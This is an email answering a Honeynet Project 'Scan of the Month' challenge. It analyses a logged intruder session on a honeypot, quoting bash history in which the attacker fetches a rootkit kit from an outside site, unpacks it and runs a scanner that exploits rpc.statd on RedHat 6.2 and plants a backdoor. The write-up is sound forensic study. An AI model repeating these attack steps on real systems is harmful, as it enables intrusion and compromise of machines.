From muddafugga@lvcm.com Sat Mar 17 20:02:41 2001 Date: Sun, 11 Mar 2001 04:04:40 -0800 From: Ed Brandwein To: Lance Spitzner Subject: Re: your mail [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] Here you go. # # SCAN OF THE MONTH #13: March, 2001 1. What is the blackhat attempting to do with his command line syntax? Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR After finding the desired directory, blackhat uses lynx to download LUCKROOT.TAR Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR After 3 false starts, blackhat strips the tar ball, extracting downloaded files. Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 Blackhat goes to the newly created directory and begins scanning specified networks using luckgo script. 2. What does the tool accomplish? The tool probes/exploits vulnerable RedHat 6.2 boxes, installs a rootkit. 3. How does the tool work? * The Luckgo script (calling luckscan-a, a statd scanner referred to as scaner-h4x0r) probes for vulnerable systems (looking to exploit rpc.statd on Redhat 6.2) in the networks specified interactively by the user. * When vulnerable boxes are found, the luckstatdx program is called to explolit rpc.statd and gain root access; it downloads and opens a rootkit (xzibit.tar), then removes traces of the rootkit installation. 4. Is this tool a worm, or would you classify it as something else? This tool is not self-propagating, so it does not qualify as a worm. It is probably more accurate to classify this as a trojan/scanner because after probing for vulnerable systems and gaining root access it then trojanizes services. 1. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? This tool is similar to the Ramen worm. * It uses a modification of the statdx tool by Ron1n. In the modification, the rootkit is downloaded, the tar ball is ripped and the tar files are deleted. * This tool is directed at Redhat version 6.2 only whereas Ramen can be directed at various versions of RedHat. * Like the Ramen worm it scans for vulnerable systems, but on user-specified, not random, networks. * Unlike Ramen it is not self-propagating. * Ramen closes the remote vulnerabilities that it used and does not appear to leave a direct backdoor into the system. Luckgo does leave a backdoor for remote access to services. * Both open the same backdoor port (39168) Bonus Question: What information can you obtain about who is using or created the tool? The author's alias appears to be beCyS with assists from ReSpEkT based on comments in the code. The site providing the downloads (becys.org) resolves to IP 64.176.171.107 which is registered to: Alabanza, Inc. (NETBLK-ALABANZA-BALT-4) 8309 Tinsley Rd. Baltimore, MD 21244 US Netname: ALABANZA-BALT-4 Netblock: 64.176.0.0 - 64.177.255.255 Maintainer: ALAB Coordinator: Cunningham, Thomas (TC12-ARIN) ipadmin@alabanza.com 410-779-1400 A visit to the becys.org website yields only a screen with the words "beCys Organization" with View - Source not enabled. Alabanza.com is the home of an automated webhosting company.